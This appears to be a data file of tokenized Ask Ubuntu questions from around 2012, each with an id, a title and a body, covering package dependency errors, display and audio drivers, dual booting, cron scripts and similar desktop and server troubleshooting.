214746	how to run 'apt-get install ' to install all dependencies ?	i am running this in ubuntu server installation : sudo apt-get install git-core gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 openjdk-6-jdk tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 but i am getting this : reading package lists ... building dependency tree ... reading state information ... curl is already the newest version . gnupg is already the newest version . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : build-essential : depends : gcc ( > = 4:4.4.3 ) but it is not going to be installed depends : g++ ( > = 4:4.4.3 ) but it is not going to be installed g++-multilib : depends : cpp ( > = 4:4.7.2-1ubuntu2 ) but it is not going to be installed depends : gcc-multilib ( > = 4:4.7.2-1ubuntu2 ) but it is not going to be installed depends : g++ ( > = 4:4.7.2-1ubuntu2 ) but it is not going to be installed depends : g++-4.7-multilib ( > = 4.7.2-1~ ) but it is not going to be installed how can i fix this ?
214749	how to get a ni traktor audio 2 sound card work with mixxx	i 've got a ni traktor audio 2 sound card i 'd like to get working with mixxx , but i do n't seem to have any success so far . the card seems to be supported in ubuntu out of the box , and it seems to work well with alsa , but i can not select it in mixxx and i 'm not sure whether is something i can do to make it see it ( e.g . through ) . so for testing purposes , on the command line i can execute aplay to check each channel : aplay -d plughw:2,0,0 test.wav and aplay -d plughw:2,0,1 test.wav that works well : i can hear the test sound on each channel ( a and b ) the relevant output for this card using aplay -d is : hw : card=traktoraudio2 , dev=0 traktor audio 2 , traktor audio 2 direct hardware device without any conversions plughw : card=traktoraudio2 , dev=0 traktor audio 2 , traktor audio 2 hardware device with all software conversions from those 2 items on the output , plughw is the one that works , whereas hw does n't . the problem is that mixxx only lets me select the hw card , which does not seem to work . i 'd like to be able to select the plughw card , which is the one that 's working . i 've tried suspending pulse audio as suggested by this question , but that did not seem to work . i also played around with an .asoundrc file similar to the one on this answer ( which was for an older model of this sound card ) , but also without success . any ideas on how to make mixxx show the right card ( and channel , while we are at it ) ? thanks !
214754	phpmyadmin - display all queries	i have installed a fresh desktop with ubuntu quantal and the following packages versions : mysql : 5.5.28-0ubuntu0.12.10.1 apache : 2.2.22 ( ubuntu ) phpmyadmin : 3.4.11.1deb1 i would like phpmyadmin to display all the queries i run . how can i do it ? thank you very much . update to be more specific , there are some queries showing into the query box , but i would like phpmyadmin to show all of them including when i export a database ( if possible ) . thank you .
214755	how can i remove unity web apps ?	i recently installed ubuntu and all has been great , except for the web apps feature . i 've tried adding a few web apps , but it 's very buggy and not a very good experience . i 'm also tired of being asked to add a website as an web app . how can i remove web apps from ubuntu entirely ? i use both chromium and firefox .
214761	12.10 installing problem on asus ux32v	i have an asus ux32vd 6 gb ram hd400 and nvidia 620m graphics . i am starting the installation but after the selection ( try or install ubuntu ) it 's waiting at black screen . so i cant install . please help i dont like windows . ( i tried all of the options at startup screen . noacpi , nomodeset etc ... did not work )
214762	how to mkdir -p -m 777 to all missing pathname directories ?	i 'm putting a file in cron.hourly which needs to create a folder on the 1st time , and giving it access to an user so i do n't need to use sudo if i want to remove all content in the folder . and in it makes folder usable also . -m 777 does n't work for missing folder when using -p # ! /bin/sh mkdir -m 777 -p 000hourly/ $ ( date + '' % m- % d- % y_ % t '' ) doesnt work : makes 000hourly for admin # ! /bin/sh mkdir -m 777 000hourly & & mkdir -m 777 -p 000hourly/ $ ( date + '' % m- % d- % y_ % t '' ) gives on next hour error mkdir : can not create directory '000hourly ' : file exists and stops executing the rest of it . this is what im trying to make so i need 777 so i could delete all folder when its too full . # ! /bin/sh profiledir=/home/kangarooo/.mozilla/firefox/a2t42sie.default/ cd $ profiledir ; mkdir -m 777 000hourly ; mkdir -m 777 -p 000hourly/ $ ( date + '' % m- % d- % y_ % t '' ) & & cp -p sessionstore.js sessionstore.bak 000hourly/ $ ( date + '' % m- % d- % y_ % t '' ) exit 0
214764	can not install 12.10 on new computer	i 'm trying to install the latest 12.10 desktop . i have burned the iso file onto a dvd using an iso burner . i then reboot my computer , and use the boot menu , i choose the dvd and it asks me if i want to try it , install it , or check for defects . whichever one i choose my screen goes blank and for a bit you can hear my dvd burner , but then it stops and the screen goes completely blank and does n't so anything . i am using a new hp pavilion model p7-1455 running windows 8 . what is wrong ? how can i fix this ?
214765	pointer position way off in java application menu 's when using gnome-shell	when using any java application in gnome-shell if the window is maximised the pointer position is way off ; but only on the menu 's , in the editor , or the side panel , the pointer is fine . this only presents itself when the window is maximized , and it seems that the further away from 0x0 the window is when you maximise it , the bigger the pointer offset . from what i have gathered it has to do with the window not updating it 's size when it gets maximised . the other issue is that when a gnome-shell notification appears , when clicking on it , i lose the ability to type in the editor , i can select text etc , but ca n't give it focus to type . i must bring up some other text input ( e.g . right click on a file on the left , select rename , which brings up a rename dialog ) after that i can type in the editor again . so , how can i fix this ? below is as much information as i can think to provide $ gnome-shell -- version gnome shell 3.6.1 $ java -version java version `` 1.7.0_09 '' java ( tm ) se runtime environment ( build 1.7.0_09-b05 ) java hotspot ( tm ) 64-bit server vm ( build 23.5-b02 , mixed mode ) $ file /etc/alternatives/java /etc/alternatives/javac /etc/alternatives/java : symbolic link to '/usr/lib/jvm/java-7-oracle/jre/bin/java' /etc/alternatives/javac : symbolic link to '/usr/lib/jvm/java-7-oracle/bin/javac '
214774	how can i 'ssh ' to an ubuntu server running on virutalbox	i have installed ubuntu server on a virtual machine in virtualbox which runs on windows 7 . how can i connect through ssh to that virtual machine ? i go and type 'ifconfig ' , and i get this address `` 10.0.2.15 '' . but when i try ssh 10.0.2.15 it ca n't establish the connection .
214776	is there a cpu frequency monitor on ubuntu 12.10	so i was wondering if there is a , ,system monitor '' program that measures cpu frequency on ubuntu ? ? ? like windows 8 has in , ,task manager '' or , ,cpu-z '' thank you in advanced
214778	enabling gamepad rumble/vibration function	i use a logitech cordless rumblepad 2 longer with my dell xps l502x . but now ( thanks to playing super meat boy ) i want to have the vibration/rumble working . is there a way to do this ?
214783	does bcache require a fresh installation ?	because my notebook has a ssd and a hdd , i want use the ssd as cache just like rapid storage in windows . i find bcache offers this functionality so i decide to try it . i got bcache and bcache-tools via git then followed the guide at : http : //evilpiepirate.org/git/linux-bcache.git/tree/documentation/bcache.txt getting started : you 'll need make-bcache from the bcache-tools repository . both the cache device and backing device must be formatted before use . make-bcache -b /dev/sdb make-bcache -c -w2k -b1m -j64 /dev/sdc does that mean i have to format the whole hdd to enable the bcache ?
214789	i can n't install eclipse adt-plugin on ubuntu12.04	i want to install the eclipse plugin but it does n't work . and this is the detail . warning : you are installing software that contains unsigned content . the authenticity or validity of this software can not be established . do you want to continue with the installation ? /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.adt_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.adt_20.0.3.v201208082019-427395 /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.base_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.ddms_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.ddms_20.0.3.v201208082019-427395 /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.gldebugger_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.gldebugger_20.0.3.v201208082019-427395 /home/geekerstyle/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.hierarchyviewer_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.hierarchyviewer_20.0.3.v201208082019-427395 /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.ndk_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.ndk_20.0.3.v201208082019-427395 /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/com.android.ide.eclipse.traceview_20.0.3.v201208082019-427395.jar /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/features/com.android.ide.eclipse.traceview_20.0.3.v201208082019-427395 /home/adm/.eclipse/org.eclipse.platform_4.2.0_1473617060/plugins/overlay.com.android.ide.eclipse.adt.overlay_20.0.3.v201208082019-427395.jar
214792	how do i customize ubuntu ?	i would like to customize my deskop , so whenever i install onto a new machine , all my the custom tools should install and i can configure as i want . please guide if anybody has idea
214794	i get `` boot error '' while i try to boot my pc with a live usb , any help ?	i am trying to install ubuntu 12.04 ( clean install ) on a system that already has 11.10 . but while i insert the usb and try to boot from it get `` boot error '' on a black screen . i previously installed 11.10 on the system from usb ; so it means that my motherboard supports booting from usb-device . any help .
214801	how to fix a grub boot-loader that does not recognize a partition without a fresh install ?	i was running two separate partitions of linux ( ubuntu and linux mint ) and windows xp when i deleted my ubuntu partition through easus partition manager on xp due to simple stupidity . this erased my grub bootloader , but i managed to install grub legacy from my linux mint live cd . however , i can not access my xp partition , and when i try to update grub boot-loader through linux mint , i receive an error message . i can not perform a clean install , so i need to know how can i fix my grub boot-loader through linux mint , so that it can recognize my windows xp partition .
214802	unity icon for a bash ran program	so i downloaded the .tar.gz for eclipse , extracted and set it up . i created a .desktop file so i could dock it in unity . i then want to be able to have a bash script open the program from the terminal . so i did alias eclipse=/opt/eclipse/eclispe this opens eclipse but the icon in unity is a ? mark , can this be made into the eclipse icon ?
214804	using ubuntu server as host for mac/windows	i hate to be that guy and ask a question that may have been asked before , but i have a specific usage case in mind and feel the question is justified . so here goes . i run a tiny app development company and i also do contracting work . i have a bunch of folders and code on my imac and macbook pro and i also use hg version control via bitbucket for projects . i have installed ubuntu server 12.x ( the latest version ) on a quad core pc with about 1.5tb of storage space ( eventually raising to 2.5tb ) and also plan to install virtual box to run windows 8 also . questions : i want to be able to control ubuntu server via vnc from my mac or macbook ( i hear chicken vnc is good ) because the computer resides in an office that is about as warm as antarctica . best options ? i want to store all of my code , graphical and audio assets and some other work related things on the ubuntu server and work off the files contained on it on my imac or mac . these code project 's generally never reach over 250mb ( that 's everything , code files are generally < 50kb ) . also plan to dropbox backup the project folder part of ubuntu that i will create . are there any shortcomings about doing this that i should be aware of ? the goal is to still use version control to manage these projects but to have things current at all times when working on either mac or any future computer . speed . will it be fast enough to access and work off via wifi ? i think yes but having a second opinion never hurts . i hope my questions make sense and thank anyone who can offer advice so much in advance . i have the basics set up now and i do n't want to waste time doing it wrong a hundred times when i can do it right the first time with some sound advice . ps : i have used linux and ubuntu for roughly 2 years in the past ( about 3 years ago ) and i am a programmer by trade so i am not afraid of the command line ; )
214805	how do i disable swap ?	i have some sensitive data in ram that i prefer not to be on disk . how do i disable swap ? i have more then enough ram . if ram gets too high i have no problems with processes being terminated . how do i disable swap ? note : i do not have a swap partition and this is running in a vm ( vmware )
214809	i ca n't install ubuntu on my new pc	i have a advent 9111 pc with radion ati hd 6670 2 gig graphic card ( it appears there is no on board graphics on m'board ) i ca n't install any of the latest versions of ubuntu . when i try to install the screen after a few seconds goes pixelated with lines running all over it , then if i leave it running the monitor cuts off with no signal going to it . i 've tried 64 bit installation and also 32 bit . i can run all versions in 'virtual box ' but want to dual boot with windows 7 i 'm presuming that the drivers for my graphic card ar n't in the initial drivers when installing . help please . bobkat100
214811	distorted graphics on start up	so i am using dual monitors and every time i boot up my machine after entering my password to login , both screens show distorted graphics which eventually go away . i am on ubuntu 12.10 the os type is 64 bit and my graphics driver is gallium 0.4 on amd rv620 . is there any way to prevent the distorted graphics from showing up at all ? the distorted graphics seem to go away after about a minute from logging in to my user account . update this continues to be an issue in ubuntu 13.10 . is this avoidable ?
214814	why mounting partition in /media/ < user > with ubuntu 12.10 instead of /media ?	what was the rationale behind changing the mount point for removable drives from /media to /media/ < username > in ubuntu 12.10 ?
214824	install from downloaded package	i want to install mysql 5.1 on ubuntu 12.04 64-bit . the reason for mysql 5.1 is that i want to use it with sqlalchemy ( python ) which does not support mysql 5.5 . if i try to search repository there is only mysql 5.5 . i tried sudo apt-get install mysql-server=5.1.58 but e : version ‘5.1.66’ for ‘mysql-server’ was not found i found package on this page https : //launchpad.net/ubuntu/+source/mysql-5.1/5.1.66-0ubuntu0.11.10.2 and downloaded it . i have a problem with installing it . is there an option for apt-get to read from the directory ?
214831	run script every last thursday of the month	how to make a script run at e.g . 16:00 every last thursday of the month using gnome-schedule or cron ?
214833	just downloaded ubuntu on macbook pro and can not see internet connections available	i am just getting started using ubuntu , and am very unfamiliar with the os and can not seem to see my wireless connection under network connections , can someone please help me ?
214835	force mount fat16 partiton ?	i have a windows xp hdd that no longer wants to mount . long story short , i tried to acces my data through a ubuntu live usb . the hard drive would n't auto mount , thus i created a mount point using : sudo mkdir /media/external when i try to mount the hdd using sudo mont /dev/sda2 /media/external -o forcer i get this error message : mount : wrong fs type , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so how can i force mount my fat16 partition so that i can save my files ?
214840	dual monitor not working completely in 12.10 after upgrade	at 12.04 , dual monitors worked perfectly . after upgrading to 12.10 , the primary monitor works , the second monitor only partly works . i am sure there is some difference between the releases that i have missed setting properly . system settings - > displays show both correctly as acer 22 '' monitors at 1680x1050 ( 16:10 ) . an icon on monitor 2 is present , but elongated ; almost an artifact , since other icons on the primary screen are absent , but this one icon is there on th second monitor . selecting the icons on both screens exist . painting is weird on monitor 2 . launcher exists and works on both screens , but even with sticky edges off , the cursor stops at the left edge of monitor 2 . clicking on text editor on screen 2 launcer will launch gedit there . if i drag it , it leaves a trail of after images like repaint is failing . if i drive the cursor on the launcher , the help tags like `` libreoffice writer '' appear , but stay on screen unless i drag the active gedit window over them . then part of the help bubbles are overwritten , leaving behind after images of the gedit window on screen . what is really fascinating is that the system settings - > displays is now ignoring monitor selection , after allowing it earlier . just before this , the help popup which said `` select a monitor to change its properties ; drag to rearrange its placement '' actually let me do that . maybe a trick of where i grab the edge of the monitor in the displays setting . i just found a working handle . when i drag monitor 1 to the right of monitor 2 , `` apply '' and confirm , both monitors work normally ( although the right monitor lets the cursor slide off the right edge onto the left edge of monitor 1 - which sounds correct ) . painting of windows does not leave an after image . however , success is only temporary . the setting survives the reboot , but painting on the left monitor , now monitor 2 , now replicates the issues from before . the after image of the gedit window and the small window for `` are you sure you want to close all programs and restart the computer ? '' are still on monitor 2 ( on the left now ) , even though they are not real windows , nor do they have processes behind them . curiously , in displays , the `` green '' monitor on the left in the display window is matched by the right monitor color in the monitor upper left corner . probably makes sense as the one on the right is now monitor 1 . if i repeat the `` drag the left monitor to the right of the right monitor on the `` displays '' window , things are oriented properly , with no display artifacts as i drag windows around either screen . also the description bubbles that pop up are overwritten on both screens , so none of those artifacts either . this goodness does not survive a reboot , however . have not tried logging out and back in . all of this after positing that the motherboard vga and hdmi ports could have been the issue . so , i installed an e-geforce 7600 gt dual dvi ( i know the web thinks it is not dvi , but vga , but the connectors are dvi ) . no change to the weird behavior . the good parts continue to work , the weirdness also works , and swapping monitor positions seems to cure the issue . so , is there a setting i have missed ? given `` swapping '' monitor 1 and 2 on the system settings ... - > displays makes it work , just not across boot , i suspect so .
214847	wubi 12.10 installation on windows 8 hangs	when installing 12.10 with wubi in windows 8 , it always hangs on almost finished copying files and install never finishes .
214848	firefox , chrome , and flash on ubuntu	ok i have recently run into some problems and was hoping you guys could help ; 1 ) on chrome sometimes when i play a video ( even on youtube ) the audio wo n't work ( yet other apps audio will work ) but after pressing the play button ( pausing and unpausing the video ) it finally works but if i pause the video and click play it goes back to not working until i re-do that process . 2 ) when i go to play videos in firefox or go to grooveshark it says i do n't have flash ; but i do and when i go to install flash it says i have the last version for linux but flash works on chrome fine ( well except the audio problem above which annoys me to no end ! )
214849	wubi downloaded and installed 64bit 12.10 on my 32bit netbook	i downloaded the wubi installer on my atom n450 netbook . when i started up ubuntu i got an error that read failed to change the mode of /ect/passwd- to 0600 . then while it booted it froze and several strange characters filled the screen . finally it loaded it ran pretty slow , and i could connect to my router , but not to the internet . ping 8.8.8.8 showed no server found . so i checked the about computer and it said i was running the 64 bit installation . now i know that my computer has a low power 32 bit chip and even the ubuntu iso download suggested a 32 bit installation . so i went to double check and see if i just missed the option for a 32 bit wubi install and i did not . there was no option . is there any way to download a 32 bit version of 12.10 through the wubi ?
214851	dual boot w/ windows 7	so my pc had windows xp and win 7 on it and i went into the xp partition and installed ubuntu 12.10 over it being sure to use 90 % of the xp partition for the / mount and 10 % for the swap . it installed but when i boot the computer it does n't give me the option of choosing between 7 or ubuntu , just booting right to the linux distro . should i have installed it in 7 over the xp partition ? i can see the drive in ubuntu that contains all the 7 files . how can i recover my 7 access ?
214856	how to reload gnome shell theme via a command ?	usually pressing alt+f2 and typing rt will reload the theme defined in gnome-shell.css . but i want a command line to do that . with command line , one can easily reload the theme via a program when file is modified or exactly saved . is there any mean to do that please ?
214860	nvidia driver overscan issue second monitor via dvi-d cable	ok , i know that i have a bit of a bizarre setup , but here goes . i have an old laptop , hp pavilion 6000 . the graphics card in there is a geforce 7150m . the monitor connection is an old 18pin . the external monitor i use is a samsung syncmaster 2333 . do n't ask me why , but this monitor only has a dvi-d connection ( yes , i have searched it ) . so i have the monitor plugged into the laptop . if i use any of the nvidia propriety drivers and try to set the resolution up to 1920x1080 ( the monitor 's native resolution ) , i get a massive overscan issue . over the years i have tried to get this to work , tinkering with my xorg.conf to death . i have also tried this on every ubuntu since 10.04 , on all the corresponding lubuntus , and on all the linux mints since lisa . exact same issue . i have even tried it in windows and it works perfectly there ( although i did get the error once , but was unable to reproduce it ) . using the open source drivers it works perfectly iff i switch off the laptop monitor ( this makes no difference with the nvidia drivers ) . i would have happily gone on using the open source drivers , except that since upgrading to lubuntu 12.10 , the open source drivers make my monitor completely hazy and have the same overscan issue until i ( through the haze , only because i know where things are ) go to the monitor settings , activate the laptop 's monitor , then deactivate it , and suddenly it comes right . i have to do this every time . so i have to find a way to fix one of them , so i may as well tackle the propriety drivers , hence this overlong question . amidst other things , i have tried the nvidia-settings , but because it is connected to an 18pin , it detects the monitor as a vga monitor and does not give me overscan correction options . i have tried custom modlines ( although there are always more of those try ) , i have tried using xrandr , and i have tried all the flatpaneloptions . what i have not tried is a gentoo build , as i do n't have time any more to do that installation , but up to about three years ago when i ran gentoo exclusively i did not have this issue . below is an link to an image with a red highlight around the portion of the screen visible to me , the numbers around it are the number of pixels which are cut off . this does seem to drift a few pixels every now and then . thanks in advance . nvidia driver issue image
214863	how to clear the history of ubuntu software center	in the usc window and go to the history tab at the top , it records every of your installations , update , removal , please tell me how to clear them i tried this : how to delete history of installed packages but it did n't work , after deleting var/log/apt/history.log /var/log/dpkg.log , there are sill many text files in the folders which referred to the history of usc .
214865	installing wireshark 1.8.3 in 12.04	to enable capture traffic on multiple interfaces at once , i tried to install wireshark 1.8.3 . however , i encountered the following errors : capture-pcap-util.c:274:1 : error : static declaration of ‘pcap_datalink_name_to_val’ follows non-static declaration /usr/local/include/pcap/pcap.h:326:5 : note : previous declaration of ‘pcap_datalink_name_to_val’ was here capture-pcap-util.c:289:1 : error : static declaration of ‘pcap_datalink_val_to_name’ follows non-static declaration /usr/local/include/pcap/pcap.h:327:13 : note : previous declaration of ‘pcap_datalink_val_to_name’ was here after doing some search , i found someone can fix it by reinstall libpcap-dev , or the following commands : rm & rmdir any file in /usr/include/pcap ' and '/usr/local/include/pcap download libpcap by sudo apt-get install libpcap0.8-dev ./autogen.sh in wireshark dir make clean & make & make install however , neither is working on ubuntu 12.04/wireshark 1.8.3 . can anyone help ?
214868	is there a way to download security updates and notify admin without installing the update ?	we use apt to download and install security updates on our production server , and most of the time this works well for us . however , this morning , our server downloaded an update , installed the updates , and then restarted one of the services being updated . this service requires a manual input on restart - and apt can not supply said input . this effectively knocked out our server for a brief period ( only a few minutes , but still ) . what i 'd like to know - is there a way to get apt to download the update , but notify via email that there is an update rather than simply install and restart services ? it would be great if we could do this per service - but there are n't a high volume of security updates ( looking at the logs ) so that 's not a deal-breaker .
214869	how to edit lightdm to show `` other user '' ?	i am an it student aide at a college and we have a very small test computer that we started messing around on with 12.04 and used likewise to join it into the windows network that we have . however , we are trying to get it to show the `` other user '' for the manual log on but the lightdm folder with lightdm.conf files are read-only . how would i be able to change that so i can write to this file ?
214870	tabbed desktop organizer for open programs ?	i run ubuntu 12.04lts and work with a lot of open pdfs , web windows , etc . the unity launcher is too slow on my netbook , and does n't provide the organizational features i need : i 'm looking for a light program that would show me a tabbed , labeled list of everything i have open so that i can easily switch between files and windows . any suggestions ? thank you ! i 'd also appreciate any suggestions for good tabbing features in various programs ( e.g . adobe reader 9 supports tabs , but i think the default font is proprietary , because all the menus show up blank ) .
214871	why do i have man pages of commands that do n't exist ?	what is panel-test-applets for ? ? i do n't know . but if i want to know i type : $ whatis panel-test-applets the answer is : panel-test-applets ( 1 ) - display installed applets i have the man page too , and i can read it : $ man panel-test-applets but there is no program with that name . maybe the command is not very useful , but is its man page more useful ? does someone know how to install that program or what is its man page for when you can not execute the program ? i ca n't even execute the command : $ panel-test-applets nor $ panel-test-applets -- help which is the only thing its man page talks about ! !
214872	ubuntu 12.10 very slow on asus eeepc 1225b	noob here . this is my first time installing ubuntu on my machine . i used wubi . windows 8 is very smooth , but ubuntu 12.10 is very very slow . it 's strange . i followed the instructions on installing using wubi . did i do anything wrong ? what should i do ? any help is appreciated . specs : http : //www.cnet.com/laptops/asus-eee-pc-1225b/4507-3121_7-35136390.html
214877	installing apache 2 in ubuntu	hello i am new to ubuntu . i am trying to install apache2 using `` sudo apt-get install apache2 '' command.i have set my java path as per rules but still its showing me this following errors : sha256sum mismatch jdk-7u3-linux-i586.tar.gz oracle jdk 7 is not installed . dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of libcommons-dbcp-java : libcommons-dbcp-java depends on default-jre-headless | java2-runtime-headless ; however : package default-jre-headless is not installed . package oracle-java7-installer which provides default-jre-headless is not configured yet . package java2-runtime-headless is not installed . package oracle-java7-installer which provides java2-runtime-headless is not configured yet . dpkg : error processing libcommons-dbcp-java ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libtomcat6-java : libtomcat6-java depends on libcommons-dbcp-java ; however : package libcommons-dbcp-java is not configured yet . dpkg : error processing libtomcat6-java ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6-common : tomcat6-common depends on libtomcat6-java ( > = 6.0.32-5ubuntu1.2 ) ; however : package libtomcat6-java is not conno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already no apport report written because maxreports is reached already figured yet . dpkg : error processing tomcat6-common ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6 : tomcat6 depends on tomcat6-common ( > = 6.0.32-5ubuntu1.2 ) ; however : package tomcat6-common is not configured yet . dpkg : error processing tomcat6 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6-admin : tomcat6-admin depends on tomcat6-common ( > = 6.0.32-5ubuntu1.2 ) ; however : package tomcat6-common is not configured yet . dpkg : error processing tomcat6-admin ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6-docs : tomcat6-docs depends on tomcat6-common ( > = 6.0.32-5ubuntu1.2 ) ; however : package tomcat6-common is not configured yet . dpkg : error processing tomcat6-docs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6-examples : tomcat6-examples depends on tomcat6-common ( > = 6.0.32-5ubuntu1.2 ) ; however : package tomcat6-common is not configured yet . dpkg : error processing tomcat6-examples ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of tomcat6-user : tomcat6-user depends on tomcat6-common ( > = 6.0.32-5ubuntu1.2 ) ; however : package tomcat6-common is not configured yet . dpkg : error processing tomcat6-user ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : oracle-java7-installer libcommons-dbcp-java libtomcat6-java tomcat6-common tomcat6 tomcat6-admin tomcat6-docs tomcat6-examples tomcat6-user e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ sheetal : /home/prakash/downloads #
214879	is it possible for windows viruses when downloaded through ubuntu affect my windows os	i know that ubuntu is immune to virus so there is no question of it getting infected while browsing the net.however i frequently transfer files from my pendrive ( which i get from other virus infested computers ) to my own laptop and save it on the data drive which is shared by both windows and ubuntu . i would like to know if there is a chance for windows viruses which might get saved and then infect it whenever i switch to windows later on.its ironic that i scan my pendrive using avast on windows and then save all my files to my hard drive to keep my laptop free from virus even though i have ubuntu . can anyone suggest an alternative ?
214881	no internet with wireless after update to 12.04	i have upgraded to 12.04 lts . i read somewhere that it could be the network manager , and that i need to downgrade.. but i am really confused as to how to do this with no internet access while using ubuntu . i am currently using windows to access the net . thanks !
214882	is it possible to tell chromium to always `` keep '' pdfs ?	i download a lot of pdfs in chromium and always get a warning telling me that `` files of this type can harm [ my ] computer '' , which forces me to manually confirm every download . i 've enabled the `` always open files of this type '' setting , but that 's only useful for after a file has been downloaded . any way around this warning ? thank you !
214886	can only access ubuntu using `` recovery mode '' or `` previous versions ''	the main link to use ubuntu takes me to a dark screen . is there anything i can do while in recovery mode to fix this ? i currently cant access the internet once i upgraded to the 12.04lts . any ideas ?
214888	mouse wheel sensitivty , razer abyssus	how do i increase the mouse wheel sensitivity ? i have a razer abysuss and i hate this problem in windows which was fixed by install the razer drivers , but they do n't support linux so what are my options ? i 'm not looking to change it in just firefox or one program but on the whole system .
214889	keystroke loss in ubuntu 12.04	working in the latest version of ubuntu , with all updates installed , i frequently have the problem of keystrokes being lost . i have that at least several times per sentence i type in any program ( also when i 'm typing this text ) . i have ubuntu installed on a toshiba satellite l670 . i have this problem since months but it got worse to the level that it is not workable anymore . can somebody please help ? thanks , dirk
214891	how do i enable/disable graphics card at will without logging out ?	my battery backup hardly lasts for 45mins . i searched for a similar problem but di n't find any solution applicable to me . i use nvidia geforce 525m graphics card and use nouveau . my laptop gets heated up to about 85 deg ( according to jupiter ) . such a power consumption is too much for my battery . is there any way i can enable my graphics card and load my kernel module only when needed without restart or logout ? and till that time use only the integrated intel graphics card . ( and i do not mean blacklisting as i would have to log out to enable it . ) i need a run-time loading and unloading of modules . update : i installed bumblebee which increases the battery life to 2 hrs. ( approx . ) . however , i 'd like to know how to load kernel modules after completing boot process .
214896	mount isnt mounting until x login ?	i am using ubuntu 12.04 and running it via vmware ( probably wont make a difference , no vmtools applied yet ) . i logged in via ssh and looked at my external hd , the folder was blank . after logging into the start screen a few seconds later my external drive is available . it appears mount isnt mounting until i login ? is there a way to change this ? i normally just leave the window in the background and simply use ssh . extra info : the drive i believe is ntfs
214900	no accounts to log in with ?	i have installed ubuntu 12.04 lts and the only accounts i have to select from to log in are `` administrator '' and `` guest '' . `` guest '' has no real rights to anything and i have no password for `` administrator '' . if i enter the recovery mode and the root console it does not `` find '' the `` passwd '' command if i try to reset the root ( administrator ? ) password . it also does not `` find '' the sudo command . i have no way at all of logging in with the administrator account and the guest account is useless . right now , my installation of ubuntu is about as useful as a brick . if the `` administrator '' account ( is this `` root '' ) is only there for the system to use , then why is it listed for logging in upon boot ? and if the `` guest '' account can not create a regular account or a user administrator account ( it would be ridiculous if it could ) then how do you create such accounts ? i 'd like to disable the guest account and i 'd like the only login accounts listed at startup to be accounts you can actually log in with .
214903	ugly boot screen after upgrading to 12.10	is there a way to change the ugly boot screen in 12.10 ? it seems to have rolled back to that 8-bit blocky looking thing with tiny orange dots underneath . it then breaks into process code under that , and it looks ghastly . i 've read some tutorials on getting plymouth to do some neat things , but they were for older versions of ubuntu . i 'm running a geforce gtx 460 if that matters . any help would be appreciated . update : i 've noticed/found a couple of things . the upgrade on my laptop did n't do this . it still uses the `` normal '' ubuntu boot logo ( using plymouth , i assume ) . so , something is off with my desktop . and , i found and installed super boot manager to see if that would help . with that , i enabled plymouth and added a new theme , but the machine still boots with the block-ugly logo . finally , i messed around with grub on boot and added `` nomodeset '' after `` quiet splash '' and added it while deleting `` quiet splash . '' none of these solutions worked . i 'll keep hunting ...
214907	broken fonts in emacs over ssh	i 'm having a problem with emacs when i ssh from my ubuntu 12.04 laptop to another linux machine . fwiw , i believe the remote machine is using suse enterprise server 10 sp2 , which is possibly quite old . i connect using ssh -x < server > . when i run emacs , i get the error messages warning : can not convert string `` -*-courier-medium-r-*-*-*-120-*-*-*-*-iso8859-* '' to type fontstruct warning : can not convert string `` -*-helvetica-medium-r-* -- *-120-*-*-*-*-iso8859-1 '' to type fontstruct and emacs is full of boxes instead of text characters , as shown below . i 've tried flushing my local font cache with sudo fc-cache -f -v but that did n't help . ideas ? thanks in advance !
214908	cross-system file links	we are using complex directory tree , shared via dropbox on windows and ubuntu . somewhere we need to refer files , placed in other folders ( like invoice_5.doc must be found under invoices as well as under clients/somename ) . before ubuntu we were able to use .lnk files . but what is the best solution for now when we are using ubuntu ( gnome ) and windows ?
